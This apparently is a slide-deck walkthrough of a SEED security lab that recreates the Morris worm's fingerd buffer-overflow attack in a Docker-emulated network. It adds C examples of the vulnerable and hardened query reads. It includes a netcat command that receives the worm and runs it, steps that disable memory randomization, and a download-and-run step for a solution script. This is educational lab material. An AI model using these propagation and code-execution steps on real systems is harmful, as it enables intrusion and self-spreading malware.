Understanding the Morris Worm Attack

Uploaded by punzango73
  • Introduction
  • Overview
  • What is Morris Worm?
  • Attacking Method
  • Why Study Morris Worm?
  • Hands-on Lab
  • Morris Attack Environment Setup
  • Hands-on Lab (1): Install seed VM
  • Ubuntu 20.04 VM
  • Hands-on Lab (2): Build a nano Internet
  • Hands-on Lab (3): Create the worm
  • Clean Up
  • Debugging

Morris Worm Attack

Developed based on
https://seedsecuritylabs.org/Labs_20.04/Networking/Morris_Worm/
Overview
• What is Morris Worm?
• How to demonstrate the attack?
• Morris Worm lab
• Setup VM
[Link]
[Link]
What is Morris Worm?
• Malware developed by Robert Tappan Morris, who
• was a first-year graduate student in Cornell University's computer science Ph.D. program
• did undergraduate work at Harvard
• became a tenured professor at MIT in 2006
• had a Unix account at Cornell
• Morris' goal
• a program that can self-spread across a national network of computers after being inserted at one computer location connected to the network
• not destructive
• demonstrate the inadequacies of current security measures on computer networks by exploiting the security defects that he had discovered
[Link]
Attacking Method
• through a "hole" or "bug" (an error) in sendmail
• a computer program that transfers and receives electronic mail on a computer
• use the finger daemon to find users' information
• through a bug in the "finger daemon" program (the lab focuses on this one)
• a program that permits a person to query limited information about the users of another computer
• it read a user's query (input) using an old version of gets() into a 512-byte buffer on the stack (buffer overflow; think about strcpy())
• through the "trusted hosts" feature
• which permits a user with certain privileges on one computer to have equivalent privileges on another computer without using a password (setuid); and
• through a program of password guessing,
• whereby various combinations of letters are tried out in rapid sequence in the hope that one will be an authorized user's password, which is entered to permit whatever level of activity that user is authorized to perform.
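The finger daemon bug above, as an added C example that is not part of the original slides or the SEED lab code: the unbounded gets()/strcpy()-style copy into a 512-byte stack buffer, beside a bounded reader that rejects an over-long query instead of overflowing. The in-memory "connection" helper and the 600-byte constructed query are assumptions made for the demo.

```c
#define _POSIX_C_SOURCE 200809L  /* for fmemopen() in the in-memory helper */
#include <stdio.h>
#include <string.h>
#define QUERY_BUF 512   /* size of fingerd's stack buffer, as stated on the page */

/* Vulnerable shape (study only, never called): the query is copied into a fixed
 * stack buffer with no length check, the gets()/strcpy() pattern the page
 * describes. More than 511 bytes overwrite the saved frame pointer and return
 * address that sit above buf on the stack. */
void read_query_vulnerable(const char *wire) {
    char buf[QUERY_BUF];
    strcpy(buf, wire);               /* no bound on the copy */
    printf("query for: %s\n", buf);
}

/* Hardened read: bounded fgets(), trailing CRLF stripped, and an over-long
 * line rejected rather than silently truncated (the remainder is drained so
 * the connection stays in sync). Returns the query length, or -1 on error. */
int read_query_safe(FILE *conn, char *out, size_t out_len) {
    if (out_len < 2 || fgets(out, (int)out_len, conn) == NULL)
        return -1;
    size_t n = strlen(out);
    if (n > 0 && out[n - 1] == '\n') {
        out[--n] = '\0';
    } else if (!feof(conn)) {        /* buffer filled before a newline: too long */
        int c;
        while ((c = fgetc(conn)) != EOF && c != '\n') {}
        out[0] = '\0';
        return -1;
    }
    if (n > 0 && out[n - 1] == '\r')
        out[--n] = '\0';
    return (int)n;
}

/* Helper (assumption): feed a constructed byte string as if it were the client connection. */
int read_query_from_string(const char *wire, char *out, size_t out_len) {
    FILE *conn = fmemopen((void *)wire, strlen(wire), "r");
    if (conn == NULL) return -1;
    int r = read_query_safe(conn, out, out_len);
    fclose(conn);
    return r;
}

/* Constructed check: a 600-byte query, larger than QUERY_BUF, must be rejected. */
int overlong_query_rejected(void) {
    char wire[602], out[QUERY_BUF];
    memset(wire, 'A', 600);
    wire[600] = '\n'; wire[601] = '\0';
    return read_query_from_string(wire, out, sizeof out) == -1 && out[0] == '\0';
}
```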
Why study Morris Worm?
• Morris Worm vs. Ransomware
• The techniques are still the same
• exploit vulnerabilities
• self-duplication
• self-spreading
• non-destructive vs. asking for a ransom fee (WannaCry)
• A virtual lab designed by Wenliang Du at Syracuse University in 2021
Hands-on Lab
Morris attack environment setup
• Install seed VM
• Running on an Internet emulator
• A simplified version of the attack code written in Python

online manual:
[Link]
[Link]
Hands-on Lab (1): Install seed VM
Download Ubuntu Image
Extract zip file
Open Oracle VM VirtualBox Manager
1: Select "Use an existing virtual hard disk file"
2: Select the folder icon to browse files
3: Point to [Link]
4: Click Finish
Click Start to launch
Hands-on Lab (2): Build a nano Internet
[Figure: The Internet Emulator, with group 1, group 2 and group 3]
• The pre-built emulator
• The lab uses multiple containers to mimic multiple PCs in a network
• Multiple PCs are in three groups (subnets)
• each group has 5 PCs, one router
• Groups are inter-connected
• The configuration of the containers is defined in [Link]
• Start the emulator
[Diagram: Docker Compose (YAML file) defines the containers; each container is built from a Dockerfile, e.g. an httpd application container and a mysql application container]
Obtain lab files
Folders we need: one mimics the Internet (nano), one visualizes attacked machines (map), and one is where the attacker writes the worm
Define a nano internet using docker
A configuration file allows you to easily start, stop, and manage multiple containers for your application's
[Annotated Docker Compose file: 1: the file consists of nodes; 2: all nodes are inherited from a base image; 3: each PC/node entry has a hostname, a Dockerfile build configuration and a real IP address; each router has a real IP address; another router with a real IP address connects the three subnets (groups)]
Define a host/node of nano internet using Dockerfile
[Annotated Dockerfile: the "from" line]
from morris-worm-base
The host/node of nano internet is inherited from another Dockerfile (morris-worm-base)
Start nano internet
Build images with the docker-compose up command (aliases are defined here)
Start the nano internet by firing up the containers using the command docker-compose up (alias)
In a new shell window (new tab), verify the nano internet is running; the three subnets are marked in different colors
Visualize nano internet
[Link]

IP range 10.X.0.Y
• X = [151-153]
• Y = [71 - 75]
How to manually send a packet from a host and observe the results
Why? The map flashes any host that pings [Link]. Once a host is infected, we let the host run "ping [Link]".
Hands-on Lab (3): Create the worm
Characteristics of the lab's [Link]
• Focus on exploiting a buffer overflow vulnerability
• (injection) use [Link] to craft a badfile containing shellcode and commands
• (control) use the shellcode to gain control of the victim's machine
• (infection/spreading) use netcat commands, in a Bash shell on the victim's machine, to receive [Link] sent by the attacking machine
• Ensure only one copy of [Link] is running
• test the existence of badfile to identify whether a victim has been infected
• if it exists, assume another [Link] is already running and kill itself
[Diagram: attacking machine and victim]
1: [Link] creates badfile (injection)
2: send badfile to another machine via buffer overflow attack
3: nc in badfile is executed (control): wait for [Link] and execute it
4: sends [Link] (spread)
5: gets [Link] running forever
The attacker writes the [Link]
10.X.0.Y
• X = [151-153]
• Y = [71 - 75]
5. send [Link] to an infected host
Solution
The infected machine will
1. listen on port 9999
2. receive [Link]
3. execute [Link]
"nc -lnv 9999 > [Link] && python3 [Link]"

Turn memory randomization off
Use different terminals
Observe $ebp and &buffer. Both messages should keep the same addresses.
[Screenshots: before/after address comparisons; the bytes shown must be 9090]
nc -lnv 9999 (must be the same as the command in the shellcode)
Launch attack
Observe nano internet
Clean up
Shut down the nano internet and the visualization server. In the ../nano and ../map folders:
$ dcdown

You can download [Link]. Make sure you make it executable:
$ wget [Link]
$ chmod +x [Link]
$ ./[Link]
Debugging
• Did you turn memory randomization off?
• sudo /sbin/sysctl -w kernel.randomize_va_space=0
• Your $ebp and &buffer may differ from the demo
• Is the shellcode format correct?
• Did you change the [Link] permission if you downloaded the solution directly from Dropbox?
• Is your nano internet running?
• Is your map server on?
• Are you monitoring the nano internet?
• icmp and dst [Link]
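For the monitoring step above (and the map's flash-on-ping behaviour described in the visualization section), an added C example that is not from the lab: it parses constructed tcpdump-style lines as the "icmp and dst" filter would print them and counts the distinct lab hosts per subnet that have beaconed to the map server. The map address 10.150.0.99 stands in for [Link] and, like the sample lines, is constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

/* Constructed tcpdump-style lines, as the page's "icmp and dst <map>" filter
 * would show them. 10.150.0.99 stands in for the map server ([Link] on the
 * page) and is an assumption; sources follow the lab's 10.X.0.Y plan. */
static const char *SAMPLE_LOG[] = {
    "10:00:01.000 IP 10.151.0.71 > 10.150.0.99: ICMP echo request, id 7, seq 1, length 64",
    "10:00:02.000 IP 10.151.0.71 > 10.150.0.99: ICMP echo request, id 7, seq 2, length 64",
    "10:00:03.000 IP 10.152.0.73 > 10.150.0.99: ICMP echo request, id 9, seq 1, length 64",
    "10:00:04.000 IP 10.153.0.75 > 10.150.0.99: ICMP echo request, id 3, seq 1, length 64",
    "10:00:05.000 IP 10.150.0.99 > 10.151.0.71: ICMP echo reply, id 7, seq 1, length 64",
    NULL
};

/* Counts the distinct lab hosts (10.X.0.Y, X = 151..153, Y = 71..75) that have
 * sent an ICMP echo request to map_ip, the beacon an infected node emits.
 * per_subnet[X-151] receives the count for each group; the return value is the
 * total. Each host is counted once even if it pings repeatedly. */
int count_infected(const char *const *lines, const char *map_ip, int per_subnet[3]) {
    unsigned char seen[3][5] = {{0}};
    int total = 0;
    for (int i = 0; i < 3; i++) per_subnet[i] = 0;
    for (; *lines != NULL; lines++) {
        int a, x, c, y;
        char dst[16];
        if (sscanf(*lines, "%*s IP %d.%d.%d.%d > %15[^:]", &a, &x, &c, &y, dst) != 5)
            continue;                              /* not an IP line */
        if (strcmp(dst, map_ip) != 0 || strstr(*lines, "ICMP echo request") == NULL)
            continue;                              /* a reply, or not aimed at the map */
        if (a != 10 || c != 0 || x < 151 || x > 153 || y < 71 || y > 75)
            continue;                              /* outside the lab's address plan */
        if (!seen[x - 151][y - 71]) {
            seen[x - 151][y - 71] = 1;
            per_subnet[x - 151]++;
            total++;
        }
    }
    return total;
}

int main(void) {
    int per[3];
    int total = count_infected(SAMPLE_LOG, "10.150.0.99", per);
    printf("infected hosts: %d (group1=%d group2=%d group3=%d)\n", total, per[0], per[1], per[2]);
    return 0;
}
```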
Observations in nodes (optional)
badfile doesn’t change
[Link] keeps changing
